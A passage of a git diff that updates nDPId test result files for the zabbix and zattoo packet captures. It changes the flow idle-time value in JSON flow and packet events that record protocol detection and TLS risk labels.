-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA85AdAAEAGTujAqENiwKhDGd9KJ0JwAdHUAAAAAKACchAH+wAAAgQFtAQCCAorwjXTAAAAAAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"OjUSPEK7RoQclwmZCABFAAA8AABAAEAGMvDAqEMZwKhDYidC30pw8XhkcAHR1aAScSDKPwAAAgQFtAQCCAorfUX3K8I10wEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA05AhAAEAGTu\/AqENiwKhDGd9KJ0JwAdHVcPF4ZYAQAOUH8wAAAQEICivCNdQrfUX3"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA85AdAAEAGTujAqENiwKhDGd9KJ0JwAdHUAAAAAKACchAH+wAAAgQFtAQCCAorwjXTAAAAAAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"OjUSPEK7RoQclwmZCABFAAA8AABAAEAGMvDAqEMZwKhDYidC30pw8XhkcAHR1aAScSDKPwAAAgQFtAQCCAorfUX3K8I10wEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA05AhAAEAGTu\/AqENiwKhDGd9KJ0JwAdHVcPF4ZYAQAOUH8wAAAQEICivCNdQrfUX3"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} 
+00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":39,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1572254070614} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 diff --git a/test/results/zattoo.pcap.out b/test/results/zattoo.pcap.out index 86fc9da1f..2be1d6195 100644 --- a/test/results/zattoo.pcap.out +++ b/test/results/zattoo.pcap.out 
@@ -1,18 +1,18 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zattoo.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614851148233} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148233,"flow_last_seen":1614851148233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148233,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614851148233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148233,"pkt":"5kBKB+riApXG95NLCABFAAAw4ZkAAIAGAAAKZQACCmYAAgtyAbsk8\/zrAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614851148234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148234,"pkt":"ApXG95NL5kBKB+riCABFAAAw4ZMAAH8GRWYKZgACCmUAAgG7C3Ik9AFrJPP87HASgAGZ0wAAAgQFtAMDAQA="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614851148234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148234,"pkt":"5kBKB+riApXG95NLCABFAAAo4ZoAAIAGAAAKZQACCmYAAgtyAbsk8\/zsJPQBbFAQgAEU6QAAAAAAAAAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148233,"flow_last_seen":1614851148234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1614851148234,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not 
Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614851148233,"flow_last_seen":1614851148235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1072,"flow_tot_l4_payload_len":1185,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1614851148235,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"5ea8fd3044cb27a1d12e476d60e0668c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Jose, O=Spirent Communications Inc., OU=IT, CN=www.spirent.com","subjectDN":"C=US, ST=California, L=San Jose, O=zattoo.com, OU=Marketing, CN=zattoo.com","fingerprint":"A8:F3:C0:1B:32:F1:73:F3:11:90:A0:01:3E:1B:3E:D5:0C:00:EB:D2"}} 
-00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAw4b4AAIAGAAAKZQACCmYAAgt4AFAk9NudAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"ApXG95NL5kBKB+riCABFAAAw4bcAAH8GRUIKZgACCmUAAgBQC3gk9N+yJPTbnnASgAHePQAAAgQFtAMDAQA="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAo4b8AAIAGAAAKZQACCmYAAgt4AFAk9NueJPTfs1AQgAEU6QAAAAAAAAAA"} 
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"},"http": {"hostname":"zattosecurehd2-f.akamaihd.net","url":"zattosecurehd2-f.akamaihd.net\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0) Gecko\/20100101 Firefox\/6.0"}} -00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1614851148233,"flow_last_seen":1614851148238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1165,"flow_tot_l4_payload_len":3626,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"}} 
-00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1614851148248,"flow_last_seen":1614851148254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":961,"flow_tot_l4_payload_len":8045,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148233,"flow_last_seen":1614851148233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148233,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614851148233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148233,"pkt":"5kBKB+riApXG95NLCABFAAAw4ZkAAIAGAAAKZQACCmYAAgtyAbsk8\/zrAAAAAHACgAEU8QAAAgQFtAMDAQA="} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614851148234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148234,"pkt":"ApXG95NL5kBKB+riCABFAAAw4ZMAAH8GRWYKZgACCmUAAgG7C3Ik9AFrJPP87HASgAGZ0wAAAgQFtAMDAQA="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614851148234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148234,"pkt":"5kBKB+riApXG95NLCABFAAAo4ZoAAIAGAAAKZQACCmYAAgtyAbsk8\/zsJPQBbFAQgAEU6QAAAAAAAAAA"} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148233,"flow_last_seen":1614851148234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1614851148234,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614851148233,"flow_last_seen":1614851148235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1072,"flow_tot_l4_payload_len":1185,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1614851148235,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"5ea8fd3044cb27a1d12e476d60e0668c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Jose, O=Spirent Communications Inc., OU=IT, CN=www.spirent.com","subjectDN":"C=US, ST=California, L=San Jose, O=zattoo.com, OU=Marketing, CN=zattoo.com","fingerprint":"A8:F3:C0:1B:32:F1:73:F3:11:90:A0:01:3E:1B:3E:D5:0C:00:EB:D2"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAw4b4AAIAGAAAKZQACCmYAAgt4AFAk9NudAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"ApXG95NL5kBKB+riCABFAAAw4bcAAH8GRUIKZgACCmUAAgBQC3gk9N+yJPTbnnASgAHePQAAAgQFtAMDAQA="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAo4b8AAIAGAAAKZQACCmYAAgt4AFAk9NueJPTfs1AQgAEU6QAAAAAAAAAA"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"},"http": {"hostname":"zattosecurehd2-f.akamaihd.net","url":"zattosecurehd2-f.akamaihd.net\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0) Gecko\/20100101 Firefox\/6.0"}} +00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1614851148233,"flow_last_seen":1614851148238,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1165,"flow_tot_l4_payload_len":3626,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1614851148248,"flow_last_seen":1614851148254,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":961,"flow_tot_l4_payload_len":8045,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"}} 
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-data-len":11671,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1614851148254} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 diff --git a/test/results/zcash.pcap.out b/test/results/zcash.pcap.out index 090ff892f..88e62830a 100644 --- a/test/results/zcash.pcap.out +++ b/test/results/zcash.pcap.out 
